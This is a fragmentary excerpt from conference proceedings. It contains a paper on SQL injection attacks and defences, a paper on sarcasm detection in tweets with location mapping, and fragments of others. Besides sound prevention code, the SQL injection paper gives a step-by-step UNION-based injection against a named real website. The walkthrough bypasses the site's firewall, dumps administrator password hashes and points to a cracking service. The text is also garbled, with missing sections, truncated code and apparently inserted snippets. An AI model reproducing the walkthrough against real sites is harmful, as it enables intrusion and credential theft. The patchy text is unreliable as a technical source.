27. Yang, X. S., & Deb, S. (2009). Cuckoo search via Lévy flights. In 2009 World Congress on
Nature & Biologically Inspired Computing (NaBIC) (pp. 210–214). IEEE.
28. Yang, X. S., & Deb, S. (2010). Engineering optimisation by cuckoo search. International
Journal of Mathematical Modelling and Numerical Optimisation, 1(4), 330–343.
29. Askarzadeh, A. (2016). A novel metaheuristic method for solving constrained engineering
optimization problems: Crow search algorithm. Computers and Structures, 169, 1–12.
30. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925.
31. Heidari, A. A., Mirjalili, S., Faris, H., Aljarah, I., Mafarja, M., & Chen, H. (2019). Harris hawks
optimization: Algorithm and applications. Future Generation Computer Systems, 97(March),
849–872.
A Comprehensive Study on SQL
Injection Attacks, Their Mode, Detection
and Prevention
Abstract SQL injection is a type of attack that exploits security vulnerabilities in
the database systems behind an application. This vulnerability is mostly encountered
in web pages with dynamic content. In this study, we discuss how attackers can
take advantage of such vulnerabilities and execute malicious code, along with
strategies to counter the negative impacts on database systems. In this context,
web applications are commonly employed for online services spanning from informal
communication to the administration of transaction accounts, and they deal with private
user information that is confidential. The underlying problem is that this information is
vulnerable to attack through unauthorized access: attackers gain entry into the system
through different hacking and cracking techniques with decidedly negative intentions. An
attacker can employ carefully crafted queries and novel strategies to bypass
authentication while gaining complete control over the web application as well as the
server. Many novel algorithms have been developed to encrypt or rewrite data queries
to prevent such attacks. In this paper, we cover the background of injection attacks,
the types of injection attacks, various case studies, and preventive measures
associated with SQL injection attacks, along with suitable illustrations.
The World Wide Web (WWW) has undergone tremendous growth in recent years.
Businesses and governments have come to realize that web applications can provide
fruitful, well-planned, and well-grounded solutions to the challenge of exchanging
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 617
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_50
618 S. Dasmohapatra and S. B. B. Priyadarshini
data and managing business in the current century. However, whether to reduce the
cost of running their applications online or out of simple ignorance, many software
companies overlook or neglect critical security concerns [1]. The web keeps
expanding, and therefore the functional security of web applications and of the
communication through them has become significant [2]. To build a correct approach,
developers must understand that security is a basic element of any software product
and that protection must be built into the software as it is being written [1].
One class of injection threat is SQL injection: user-supplied data is incorporated
into a Structured Query Language (SQL) query that is passed to the database. In this
way, the user's input is interpreted as part of the SQL query, so SQL commands
specified by the attacker are directly or indirectly executed against the database
through the exposed interface. This kind of threat is dangerous for every web
application that receives records from clients and forwards them in SQL statements
to an underlying database [3].
Such an attack may be carried out by including strings of harmful characters in
form field values or by passing crafted characters through the URL. Injection
attacks in many cases take advantage of improper validation of input/output data.
A Structured Query Language Injection Attack (SQLIA) is a code-injection attack:
harmful SQL commands are injected via data entered by the client into the
application and are then passed to the database instance for execution, with the
purpose of altering the behavior of the intended SQL statements [2]. There are
various techniques a web designer or system administrator can apply during the
application development cycle to keep such attacks out of their systems, including
the use of parameterized queries, least privilege, dedicated accounts, and
customized error messages [2].
Such strategies remain an effective way to prevent SQL injection vulnera-
bilities. However, these manual methods are prone to human error and are not
applied as rigorously and reliably as automated methods. Although most developers
try to code their websites carefully, it is challenging to defend every source of
insertion cautiously and successfully. As a result, researchers have proposed a
variety of strategies and techniques to aid developers and to compensate for the
shortcomings of defensive coding. These strategies use static, dynamic, or hybrid
analysis to detect SQLIA. For example, as shown in Fig. 1, an attacker typically
types a crafted username and password into the text boxes of an online login form
so as to bypass the database security system by making the authentication statement
always true [4–6].
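The tautology trick described here is easy to reproduce. The sketch below uses an in-memory SQLite database (the schema and credentials are made up) to show how string concatenation lets a crafted input make the WHERE clause always true:

```python
import sqlite3

# Illustrative user table (hypothetical schema and credentials)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'secret')")

def naive_login(name, pw):
    # Vulnerable: user input is concatenated straight into the SQL statement
    q = f"SELECT COUNT(*) FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return db.execute(q).fetchone()[0] > 0

assert naive_login("alice", "secret") is True
assert naive_login("alice", "wrong") is False
# The classic tautology turns the WHERE clause into
#   name = 'alice' AND pw = '' OR '1'='1'
# which matches every row, bypassing authentication
assert naive_login("alice", "' OR '1'='1") is True
```

The parameterized-query defences discussed in the prevention section close exactly this hole by keeping user input out of the SQL text.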
Moreover, there are additional methods for opposing SQLIA that we specify in
the rest of this paper, which is organized as follows. We start by motivating the
vulnerability and introducing SQL injection attacks. We then examine the existing
taxonomy
A Comprehensive Study on SQL Injection Attacks … 619
of SQL attack prevention and detection approaches. We evaluate distinct SQLIA
countermeasures and characterize their deployment requirements. Finally, a brief
conclusion is given. Table 1 illustrates the vulnerabilities encountered in various
web applications.
A vulnerability is a weak spot in an application that may be a design flaw or a
development fault. An attacker can misuse such vulnerabilities to steal individual or
company data. SQL injection, broken authentication, cross-site scripting (XSS),
session management flaws, and cross-site request forgery (CSRF) are among the
programming-level vulnerabilities found in most modern web applications [1–10].
According to reports furnished by OWASP [5] and WHID [6], SQLIA and XSS are
the most common attacks. SQLIA is considered one of the most severe attacks,
striking at the confidentiality, integrity, and availability of data. A SQLI vulnerability
allows SQL code supplied through an input field of a web form to obtain improper
access for reading or modifying data. Using this vulnerability, an attacker may send
his commands directly to the web application and degrade its overall performance.
SQLI attacks can be classified into five principal classes based on the vulnerabilities
in web applications; this categorization is explained in Table 1 [7–10].
Various reports suggest that more than 40,000 such attacks per day threaten the
real world, so this is a massive problem that demands effective countermeasures.
Nowadays, many web applications use databases for saving the data needed for
the applications' activity, such as customer details, personal data, and sensitive
financial records, in domains ranging from finance and government to social
networks. All of them combine a range of technologies, allowing programmers to
develop web applications that are attractive and useful to customers (e.g., e-shops,
net banking). Table 2 describes the types of SQL injection attack.
3 Prevention System
switch ($TableName) {
    case 'fooTable':
    case 'barTable':
        return true;
    default:
        throw new ErrorDataException('unexpected value provided as table name');
}
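SQL identifiers such as table names cannot be supplied as bound parameters, which is why an allowlist like the switch above is the usual guard. A Python sketch of the same idea, with assumed table names:

```python
ALLOWED_TABLES = {"fooTable", "barTable"}  # assumed allowlist of identifiers

def safe_table(table_name):
    # Identifiers cannot be bound as query parameters, so validate the name
    # against a fixed allowlist before interpolating it into the SQL text
    if table_name not in ALLOWED_TABLES:
        raise ValueError("unexpected value provided as table name")
    return table_name

assert safe_table("fooTable") == "fooTable"
caught = False
try:
    safe_table("users; DROP TABLE users")  # injection attempt is rejected
except ValueError:
    caught = True
assert caught
```

Only values (not identifiers) should ever be interpolated, and then only via the parameterized queries discussed below.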
<?php
if (isset($_POST["selRating"])) {
    $number = $_POST["selRating"];
    if ((is_numeric($number)) && ($number > 0) &&
may also come under attack and send malformed records without their
knowledge [10, 11].
This kind of method compiles the query before the user-supplied values are
attached to the provided SQL code. The approach binds the inputted values and
validates them against the database to access the server authentically [11]. The
customer-entered data is then supplied to complete the authentication process. This
kind of coding helps prevent SQLIA, and it can be done using the queries of the
MySQLi extension. PHP 5.1 introduced an upgraded interface for this purpose in
the form of PHP Data Objects (PDO), which carries out strategies that clarify the
usage of such queries. PDO also reduces the code to its simplest form so that it can
be operated with different database servers such as MySQL [8–11]. The PHP code
for a parameterized query is illustrated in Fig. 5.
<?php
$id = $_GET['id'];
$database_connection = new PDO(
    'mysql:host=localhost;dbname=sql_injection_example',
    'dbuser', 'dbpasswd');
// preparing the query
$sql = "SELECT username FROM users WHERE id = :id";
$queries = $database_connection->prepare($sql);
$queries->bindParam(':id', $id);
$queries->execute();
// getting the result
$queries->setFetchMode(PDO::FETCH_ASSOC);
$result = $queries->fetchColumn();
print(htmlentities($result));
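The same prepared-statement idea carries over to other stacks. As a minimal sketch using Python's stdlib sqlite3 module (with a hypothetical users table, not the paper's schema), a bound parameter is treated as a value rather than as SQL, so a classic injection payload matches nothing:

```python
import sqlite3

# In-memory database with a hypothetical users table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

malicious_id = "1 OR 1=1"  # classic SQLIA payload

# Parameterized query: the payload is bound as a single value,
# never parsed as part of the SQL statement.
rows = conn.execute(
    "SELECT username FROM users WHERE id = ?", (malicious_id,)
).fetchall()
print(rows)  # the payload matches no id, so no rows leak
```

A legitimate lookup, e.g. binding the integer 1, still returns the expected row; only the structure-altering payload is neutralized.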
A developer uses this method to group more than one statement. A Transact-SQL query is combined with logical segments to obtain an execution routine. The procedure is saved as a named object in the MySQL data server. Whenever we want to execute such code, the stored procedure simplifies and verifies it. The technique below is an example of a stored procedure, in which we create a table using the stored procedure (Fig. 6).
Consider an employer who wants to gather some information about salaries. First, we create a user named ‘examp’ as follows:
CREATE USER 'examp'@'localhost' IDENTIFIED BY 'mypassword';
This user only has the privilege to execute queries and fetch data from the server, as granted below:
GRANT EXECUTE ON windy.* TO 'examp'@'%';
DELIMITER $$
$database_connection = new PDO(
    'mysql:host=localhost;dbname=windy', 'examp', 'mypassword');
$database_connection->exec('call avg_sal(@out)');
$resi = $database_connection->query('select @out')->fetchAll();
print_r($resi);
3.4 Escaping
In this prevention technique, customer-supplied input is always passed through a character-escaping function before it reaches the DBMS. With this technique, the escaped input can no longer confuse the SQL statement written by the developer. Here, we have used mysqli_real_escape_string() in PHP. Without escaping, unintended SQL functions can be supplied; Fig. 9 shows a way such input can bypass the login-field authentication [7].
The code above remains exploitable unless a character such as ‘\’, called the escape character, is placed in front of each single quote. With these few alterations, this technique can prevent SQLIA.
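As an illustrative sketch only (not the actual mysqli_real_escape_string() implementation), the escaping idea can be shown by backslash-prefixing each single quote so that the classic ' OR '1'='1 payload stays inside the string literal instead of terminating it:

```python
def escape_single_quotes(value: str) -> str:
    """Naive illustration of escaping: prefix each single quote with a backslash."""
    return value.replace("'", "\\'")

payload = "' OR '1'='1"
query = "SELECT * FROM users WHERE name = '%s'" % escape_single_quotes(payload)
print(query)
# The quotes inside the payload are now escaped, so the WHERE clause
# compares against a harmless literal string instead of being rewritten.
```

Escaping alone is fragile (character-set tricks can defeat it in real DBMSs), which is one reason the parameterized queries of the previous subsection are generally preferred.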
Root-access accounts should not be used to validate ordinary database accounts; root should be used only when truly needed, since attackers could otherwise gain access to the entire server [11]. For this reason, it is best to enforce the least privilege on the data server to protect the software against SQL injection [9].
This is one of the best prevention techniques to avoid SQLIA: the web application firewall (WAF) [12]. With the firewall technique, threats and malicious user inputs are monitored and identified before they reach the database. Basically, it is a checkpoint between the Internet and the web application for authentic logins. A web application firewall helps secure the website through well-defined safety rules; these rules differ for every web application according to its security needs. The WAF policies inform the firewall of the website's weaknesses through scanning procedures; with this information, the WAF monitors users and their requests to find malicious inputs and block them [11, 12]. Web firewalls help protect against many malicious functions and security threats, among them cross-site scripting, cookie poisoning, session hijacking and SQLIA. Moreover, a web firewall also gives the following benefits:
• It automatically protects against basic known and unknown malicious injection attacks.
• It monitors HTTP and provides real-time safety for the web application when an attacker logs in or tries to reach the data server without authorization.
Finally, to avoid malicious attacks, a developer should know about all kinds of attacks and their prevention techniques for overcoming security threats [11].
*Command used: order by n --+ (where n starts from 1 and is increased until an error occurs).
-----------------
Implementation.
-----------------
* http://tncgroup.pk/content.php?Id=2 order by 1 --+
* http://tncgroup.pk/content.php?Id=2 order by 2 --+
* http://tncgroup.pk/content.php?Id=2 order by 3 --+
* ...
* http://tncgroup.pk/content.php?Id=2 order by 14 --+
!!!!! Error occurs !!!!!
Now we must find the vulnerable columns among the total of 13 columns.
Command used: union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+
---------------------------------------------------------------------------
Implementation: http://tncgroup.pk/content.php?Id=-2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+
----------------------------------------------
* - (minus) is used before the parameter to bypass the web application firewall (WAF).
Output:
Columns 2 and 3 are reflected in the page; since 2 is rendered in bold rather than 3, we will proceed with column 2.
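The column-counting step above can be scripted. A sketch that merely builds the ORDER BY probe payloads for the URL from the paper (actually sending the requests and checking each response for an error is left out):

```python
base = "http://tncgroup.pk/content.php?Id=2"

# Probe payloads: increase n until the page errors; n - 1 is the column count.
probes = [f"{base} order by {n} --+" for n in range(1, 15)]
print(probes[0])    # the first probe, order by 1
print(probes[-1])   # the probe that triggers the error, order by 14
```

In a real test each probe would be URL-encoded and fetched, stopping at the first response that contains a database error.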
Note:
-- Write the function names in place of the vulnerable column:
* to get the database name: database()
* to get the version: version()
* to get the username: user()
4.5 Step 5. Finding the Column Name from the Target Table
Command Used
group_concat(column_name)
Command used:
---------------------
group_concat(plogin,0x3a,ppass) // 0x3a (a colon) is placed between the column names, which are separated by commas, to distinguish the username from the password
from tbl_admin --+
* The group_concat() expression is placed in the vulnerable column (2) we found, and "from tbl_admin --+" is appended at the end, after 13, the total number of columns.
Output:
21232F297A57A5A743894A0E4A801FC3:
202CB962AC59075B964B07152D234B70
These hashes may correspond to admin/123; a lookup service such as hashkiller.co.uk can be used to crack them.
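The guess can be verified offline: the two dumped strings are unsalted MD5 digests, as a short check with Python's hashlib confirms:

```python
import hashlib

# The two strings dumped from tbl_admin above.
dumped = ("21232F297A57A5A743894A0E4A801FC3",
          "202CB962AC59075B964B07152D234B70")

# Hash the candidate credentials and compare.
for guess, digest in zip(("admin", "123"), dumped):
    computed = hashlib.md5(guess.encode()).hexdigest().upper()
    print(guess, computed == digest)  # both comparisons print True
```

This is why storing plain MD5 password hashes is unsafe: common values are instantly recoverable from public lookup tables.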
5 Conclusion
The Structured Query Language injection attack is a technique used for stealing data from a web server. In this paper, we have studied the types of SQL attacks, their techniques, and prevention methodologies. We have observed that every web application has a back end, and in the back end there is a data server/database. If an attacker can bypass the authentication process, get into the database and view and extract information illegally, this is called an injection attack. SQLIA can be performed by bypassing the login page with malicious SQL code or clauses. To prevent such attacks, developers should have basic knowledge of these techniques. In the future, we will try to derive new prevention methods to secure our databases against such attackers, and more research on web firewalls is needed to protect web applications. Although various strategies have been developed to counter SQL injection attacks, more sophisticated, fault-tolerant and reliable algorithms can still be developed for providing better security to the system.
References
1. Shema, M. (2010). Seven deadliest web application attacks (pp. 47–69). Elsevier.
2. Halfond, W. G. J., & Orso, A. (2006). Preventing SQL injection attacks using AMNESIA. In Proceedings of the 28th International Conference on Software Engineering (ICSE) (pp. 795–798). ACM, Shanghai, China, May 20–28, 2006.
3. Alazab, A., & Khresiat, A. (2016) New strategy for mitigating of SQL injection attack.
International Journal of Computer Applications (IJCA), 154, 11.
4. Halfond, W. G., & Orso. A. (2005). Analysis and monitoring for neutralizing SQL-injection
attacks. In Proceedings of the 20th IEEE/ACM International Conference on Automated
Software Engineering.
5. Som, S., Sinha, S., & Kataria, R. (2016). Study on SQL injection attacks: Mode, detection and prevention. International Journal of Engineering Applied Sciences and Technology (IJEAST), 1(8), 212–220.
6. Dornseif, M. (2005). Common failures in internet applications. http://md.hudora.de/presentat
ions/2005-common-failures/dornseif-common-failures-(2005-05-5).pdf.
7. Patel, N. (2015). Implementation of pattern matching algorithm to defend SQLIA. In International Conference on Advanced Computing Technologies and Applications (ICACTA-2015), Procedia Computer Science, 45, 444–450. See also: https://www.ptsecurity.com/ww-en/analytics/knowledge-base/how-to-prevent-sql-injection-attacks/.
8. Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox, 2, 113–120.
9. Chris, A. (2010). Advanced SQL injection in SQL server applications, vol. 9, p. 2. http://www.
nextgenss.com/papers/advanced_sql_injection.pdf (2002).
10. Stephen, J. F. (2005). SQL Injection attacks by example, vol. 3, pp. 3–5
11. Elmasri, R., & Navathe, S. B. (2011). Fundamentals of database systems (6th ed.). United
States of America: Addison-Wesley.
12. Nithya, V., Regan, R, & Vijayaraghavan, J. (2013). A survey on SQL injection attacks, their
detection and prevention techniques. International Journal Of Engineering And Computer
Science (IJECS), 2(4), 886–905.
13. Limei, M., et al. (2019). Research on SQL injection attack and prevention technology based on
web. In International Conference on Computer Network, Electronic and Automation (pp. 176–
179).
14. Su, G., et al. (2018) Research on SQL injection vulnerability attack model. In 5th IEEE
International Conference on Cloud Computing and Intelligence System (pp. 217–221).
Sentimental Analysis on Sarcasm
Detection with GPS Tracking
Abstract Sentiment analysis, also known as opinion mining, is one of the major tasks of natural language processing (NLP). It is a technique used to identify a person's sentiment, humor and emotion. Sarcastic comments imply what a person wants to say in a conflicting manner. Sarcasm is widely used across social networking and microblogging sites, where individuals mock others, making it tricky to tell what a comment really implies. For example, a sarcastic tweet such as "Technical talk right after lunch" sounds positive but describes an undesirable activity. A number of studies have addressed sarcasm. In this paper, feature extraction techniques and classifiers such as logistic regression, support vector machine (SVM) and random forest are used to recognize sarcasm in tweets from the Twitter streaming API. The best classifier is selected and combined with different pre-processing and filtering methods using sarcastic and non-sarcastic lexicon mapping to give the best possible precision. A GPS tracking system is used to collect the data and determine which location the tweets are coming from. The sarcastic and non-sarcastic dictionary is the novel idea introduced in this paper.
M. Sharan (B)
Computer Science and Engineering Department, Institute of Engineering and Technology,
Lucknow, India
e-mail: Msharan.csed.cf@ietlucknow.ac.in
M. Ravinder
Computer Science and Engineering Department, Indira Gandhi Delhi Technical University For
Women, Delhi, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 633
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_51
634 M. Sharan and M. Ravinder
1 Introduction
Of late, social networking platforms like Twitter, Instagram and Amazon have gained broad popularity and significance. Twitter is one of the biggest social platforms, where individuals express their opinions, emotions and perspectives on ongoing occurrences, for example through live tweets. Twitter permits clients to register, send messages and then read the replies, which are termed tweets. Sarcasm is a particular difficulty faced in sentiment analysis. Twitter also empowers various clients to communicate their thoughts and conclusions, which enables many organizations to know the popular assessment of their items or administrations and to give continuous client help. Sarcasm is communicating pessimistic sentiments using decisive words; it likewise occurs when an individual wants to convey something different from what they say. Sarcasm is used not only for mockery but also for reprimanding others, their appearance, thoughts and so forth, which is why sarcasm is used so much on Twitter. Sarcasm can be conveyed in different manners, like direct discussion, speech or text. It can even be imitated in ratings by giving a low number of stars.
Organizations continuously tap into social media to understand customer opinion around products and services and to give real-time customer support. From a research perspective, among the various problems in natural language processing (NLP), some are easy and some are hard. It is widely believed that question answering, summarization and translation belong to the category of hard problems, and sarcasm detection is one more addition to this list. Sarcasm is a deliberate play on the part of the speaker, who plays with the language and its nuances to communicate something sarcastically; hence, it is subtle in nature. It can be just a play of language, where the difference lies in a word here or there, a punctuation mark or a phrase.
A GPS tracking system is used in such a way that once a comment is detected as sarcastic, GPS tracking is done. The mechanism uses the global positioning system (GPS) to trace any mobile device's journey while determining its accurate location. The recorded location data can be stored in the tracking device or transferred to an internet-connected gadget using the radio or satellite modem already embedded in the unit. This tells us where more sarcastic comments are coming from so that they can be addressed, such as comments on politics, racism, etc. We therefore combine these capabilities with Twitter's geolocation information and the easy-to-use functionality of GeoCommons to make an interactive map of the racist tweets.
The contents of the paper are divided into different sections. Section 3 talks about
the previous work done in sentimental analysis on sarcasm detection. Table 1 shows
different sentimental analysis on Sarcasm detection. Section 9 shows experimental
results and finally the paper is concluded in Sect. 10.
Table 1 Different sentiment analyses on sarcasm detection

S. No. | Topic | Author name | Methodology | Task | Dataset | Classification used
1 | Sentiment analysis for sarcasm detection on streaming short text data | Prasad et al. [1] | POS training, POS testing, PBLGA testing | To discover the exactness of the proposed model | Online review sites, media sites and other microblogging sites | The PBLGA algorithm utilized 1.45 million tweets as its test data
2 | Sarcastic detection of tweets streamed in real time | Bharti et al. [5] | POS training, POS testing, PBLGA testing | To discover the exactness of the proposed model | Online review sites, media sites and other microblogging sites | The PBLGA algorithm utilized 1.45 million tweets as its test data
3 | Sarcasm detection in sentiment analysis | Kaushik and Barot [6] | Support vector machine (SVM), logistic regression | Identifying sarcasm | Sarcasm-labeled corpus | Bag-of-words and features based on punctuations such as ‘!’ and ‘?’
4 | A comprehensive study on sarcasm detection techniques in sentiment analysis | Sindhu et al. [7] | Data collection, data pre-processing, polarity detection | Relating comments with tags | Twitter and Amazon | Emoticons, punctuation marks, quotation marks
5 | Detection of sarcasm in text data using deep convolutional neural networks | Mehndiratta et al. [8] | Data pre-processing and data preparation | To identify a superior classifier among the … | Twitter Streaming API | Word tokenization, POS tagging, …
2 Literature Review
Prasad et al. [1] suggested a system to identify sarcastic and non-sarcastic tweets based on the slang and emoticons used in tweets. Their main concern was the quality of the slang and emoticon dictionary. These features are then compared across diverse classification algorithms like random forest, gradient boosting, logistic regression with adaptive boosting, and Gaussian Naïve Bayes to distinguish the sarcastic tweets from the Twitter Streaming API. The best classification algorithm is chosen and combined with various pre-processing and filtering strategies using emoticon and slang dictionary mapping to provide the best proficiency.
Parveen and Deshmukh [2] proposed an algorithm to distinguish sarcastic comments on Twitter using support vector machine (SVM) and maximum entropy algorithms. Initially, the authors divided their work into two datasets: one from before adding the sarcastic tweets to the training data and the other from after adding the sarcasm to the training data. Tagging was done using the Penn treebank to align every word with its associated linguistic form. The authors extracted features related to sentiment, punctuation, syntax and design with the help of the input data. After extracting features, classification is performed using the SVM and maximum entropy algorithms. Compared between these, maximum entropy gives higher precision than the support vector machine.
Jain et al. [3] suggested a system using the random forest algorithm along with weighted ensemble algorithms for identifying sarcastic tweets, with the help of a pragmatic classifier for the detection of emotion-based sarcasm. The authors argue that sarcasm is nothing but a positive sentiment attached to a negative sentiment or a pessimistic circumstance. Precision and accuracy are examined to measure the adequacy of the random forest classifier and the weighted ensemble algorithms; the two gave the same accuracy when compared in the end.
Manohar and Kulkarni [4] proposed another methodology for sarcasm recognition based on NLP and a corpus-based approach. The authors' goal was to understand why a client is willing to use a sarcastic comment instead of just writing honest feedback. The authors gathered tweets from the Twitter site and applied NLP methods like tokenization, part-of-speech (PoS) tagging and lemmatization. The NLP procedures were applied to the tweets to retrieve activity words. The activity words retrieved from the tweets are matched with the collection of sarcasm information using semantic matching and graph-based matching, yielding an average sarcasm score over the tweet data. With this average, the severity of sarcasm in the tweet data was analyzed.
3 Related Researches
With progress in data mining and text mining algorithms, joined with the colossal amount of text data being created each day across a wide scope of social media platforms, in this case Twitter, the probability of governments trying to inspect opinions and presumptions is far more feasible now than at any other time. Table 1 shows the different sentiment analyses of sarcasm detection with their task, dataset, classification and methodology.
5 Proposed Architecture
For testing sarcasm in sentiment analysis, 16,000 sarcastic tweets and 16,000 non-sarcastic tweets were accumulated.
7 Evaluation
A. Verification input
Information used in the experiment was collected from Twitter with an official email. The total data we gathered was 27,000 tweets, of which 13,000 were sarcastic tweets and 14,000 were real tweets. Of this, we took 65% as training data and 35% as test data.
B. Assessment outcomes
The datasets [11] were assessed in light of the classifiers used. The classifiers used here are support vector classification, logistic regression, Naïve Bayes classification and decision tree.
Classification. For assessing our conclusions, we use a standard heuristic: the area under the curve (AUC) of the receiver operating characteristic (ROC) curve for all classifiers.
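AUC can be computed without plotting the full ROC curve. As a minimal stdlib sketch (on toy scores, not the paper's data), AUC equals the fraction of positive/negative pairs that the classifier ranks correctly, the Mann-Whitney statistic:

```python
def auc(scores, labels):
    """AUC as the fraction of positive/negative pairs ranked correctly.
    Ties count as half a correct pair."""
    pos = [s for s, y in zip(scores, labels) if y == 1]
    neg = [s for s, y in zip(scores, labels) if y == 0]
    wins = sum((p > n) + 0.5 * (p == n) for p in pos for n in neg)
    return wins / (len(pos) * len(neg))

# Toy scores from a hypothetical sarcasm classifier (label 1 = sarcastic).
print(auc([0.9, 0.8, 0.3, 0.1], [1, 1, 0, 0]))      # 1.0: perfect ranking
print(auc([0.9, 0.4, 0.35, 0.1], [1, 0, 1, 0]))     # 0.75: one pair misranked
```

An AUC of 0.5 corresponds to random ranking, which is why values close to 1.0 are reported as strong results.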
(1) Support Vector Classification
We use SVM to separate our data into two parts, i.e., positive comments and negative comments, with a hyperplane; it creates two margin lines at some distance from the hyperplane so that the points of both classes are easily separable. Given a set of training examples, each marked as belonging to one of two categories (sarcastic and non-sarcastic tweets), the support vector machine training algorithm builds a model that assigns new examples to one category or the other, dividing the space into two parts (Fig. 2).
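The hyperplane itself is just a weight vector w and a bias b, and classifying a new example reduces to the sign of w·x + b. A minimal sketch of that decision rule (the weights and the two features are made up for illustration, not trained on the paper's tweets):

```python
# Hypothetical trained weights for two features,
# e.g. (positive-word count, exclamation-mark count).
w = (1.0, -2.0)
b = -0.5

def classify(x):
    """SVM decision rule: which side of the hyperplane w.x + b = 0."""
    score = sum(wi * xi for wi, xi in zip(w, x)) + b
    return "non-sarcastic" if score >= 0 else "sarcastic"

print(classify((3.0, 0.0)))  # score 2.5, above the hyperplane
print(classify((1.0, 2.0)))  # score -3.5, below the hyperplane
```

Training chooses w and b to maximize the margin between the two classes; prediction is only this sign computation.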
We create a decision tree with the datasets we have collected. The target attribute here is negative comments (Figs. 4 and 5). We analyzed sarcastic and non-sarcastic tweets and utilized the ROC curve for every classifier.
(5) GPS Tracking
The map utilizes a location quotient which "demonstrates each state's share of election hate-speech tweets relative to its total number of tweets." Seven grayed-out states had no racist tweets. Strangely, the greater part of those seven appear to be states that have lower Twitter use than the rest. Six of the gray states (Alaska, Idaho, S. Dakota, Wyoming, Montana and Hawaii) had a very low number of tweets overall, although one (Rhode Island) had a noteworthy number of tweets (Fig. 6).
8 Testing Method
In the testing phase, we exploit an early-exit gain in the overall outcome: if any one algorithm marks a tweet as sarcastic, we do not need to check the other algorithms; the tweet is automatically announced sarcastic, saving time and improving efficiency. After obtaining the sarcastic tweets, plotting is finally done through the GPS tracking system, which shows the areas prone to more sarcastic tweets.
9 Results
Sentiment analysis for sarcasm detection in social media shows people's current opinions about any real-time event or trend. In this paper, different algorithms were compared, and the classifier that gave the best outcome is the support vector machine. The tweets with sarcastic comments were then processed by the GPS locator, which tells us the exact areas from which the most sarcastic comments came. In the future, we can detect sarcasm in tweets that use hashtags and emoticons. Emoticons are generally used in the comment box to portray a person's emotions, but knowing whether an emoticon marks a positive or a negative comment is a strenuous task.
References
1. Prasad, A. G., Sanjana, S., Bhat, S. M., & Harish, B. S. (2017). Sentiment analysis for
sarcasm detection on streaming short text data. In 2nd International Conference on Knowledge
Engineering and Applications. IEEE.
2. Parveen, S., & Deshmukh, S. N. (2017). Opinion mining in twitter-sarcasm detection.
International Research Journal of Engineering and Technology (IRJET), 04(10), 201–204.
3. Jain, T., Agrwal, N., Goyal, G., & Agarwal, N. (2017). Sarcasm detection of tweets: a
comparitive study. In Tenth International Conference on Contemporary Computing (IC3).
IEEE.
4. Manohar, M. Y., & Kulkarni, P. (2017). Improvement sarcasm analysis using NLP and corpus
based approach. In International Conference on Intelligence Computing and Control Systems
(ICICCS). IEEE.
5. Bharti, S. K., Vachha, B., Pradhan, R., Babu, K., & Jena, S. (2016). Sarcastic sentiment detection in tweets streamed in real time: A big data approach. Digital Communications and Networks, 2(3), 108–121.
6. Kaushik, S., & Barot, M. P. (2016). Sarcasm detection in sentiment analysis. IJARIIE, 2(6).
ISSN(O)-2395-4396.
7. Sindhu, C., Mandala, G. V., & Rao, V. (2018). A comprehensive study on sarcasm detection techniques in sentiment analysis. ResearchGate, June 2018.
8. Mehndiratta, P., Sachdeva, S., Soni, D. (2017). Detection of sarcasm in text data using deep
convolutional neural networks. Scalable Computing: Practice and Experience, 18(3).
9. Tungthamthiti, P., Shirai, K., & Mohd, M. (2017). Recognition of sarcasm in tweets based
on concept level sentiment analysis and supervised learning approaches. In 28th Pacific Asia
Conference on Language, Information and Computational (pp. 403–413).
10. Bhattacharyya, P. (2018). Sarcasm detection: A Computational and Cognitive study. CSE dept,
IIT Bombay and IIT Patna, Jan 2018.
11. www.internetlivestats.com/twitter_statistics/.
12. https://www.analyticsvidhya.com/blog/2017/09/naive-bayes-explained/.
13. Buscaldi, D., Rosso, P., & Reyes, A. (2013). From humour recognition to irony detection: The
figurative language of social media. Data & Knowledge Engineering April 2013
14. Barbieri, F., & Saggion, H. (2014). Automatic detection of irony and humour in twitter. In
Proceedings of the student Research Workshop at the 14th Conference of the European Chapter
of the association for Computational Linguistics (pp. 56–64). Gothenburg, Sweden.
15. Bifet, A., & Frank, E. (2015). Sentiment knowledge discovery in twitter streaming data. In
Discovery Science (pp. 1–5).
16. Forslid, E., & Wiken, N. (2015) Automatic irony-and sarcasm detection in social media.
ISSN:1401-5757 uptec f15 045.
17. Bamman, D., & Smith, N. A. (2016). Contextualized sarcasm detection on twitter. School of
Computer Science, Carnegie Mellon University
18. Joshi, A., Sharma, V., & Bhattacharyya, P. (2016). Harnessing context incongruity for sarcasm
detection. Res Gate 69–53.
19. Bindra, K. K., et al. (2016). Tweet Sarcasm: Mechanism of sarcasm detection in twitter.
International Journal Of Computer Science and Information Technologies (IJSCSIT), 7(1).
20. Mukherjee, S., & Bala, P. K. (2017). Detecting sarcasm in customer tweets : An NLP based
approach. Industrial Management & Data Systems, 117(6), 1109–1126.
21. Sreelakshmi, K., & Rafeeque, P. C. (2018). An effective approach for detection of sarcasm in
tweets. In International CET Conderence on Control, Communication and Computing (IC4)
(pp 337–382), IEEE, July 05–07.
22. Arora, M., & Kansal, V. (2019). Character level embedding with convolution neural network
for text normalization of unstructured data for twitter sentiment. Social Network Analysis and
Mining, 9(1), https://doi.org/10.1007/S13278-019-0557-Y, 2019.
Impact of Machine Learning Algorithms
on WDM High-Speed Optical Networks
Abstract This paper focuses on comparing the various machine learning (ML) algo-
rithms that can be applicable in wavelength division multiplexing (WDM) optical
networks to provide better simulation outcomes. ML, combined with WDM optical
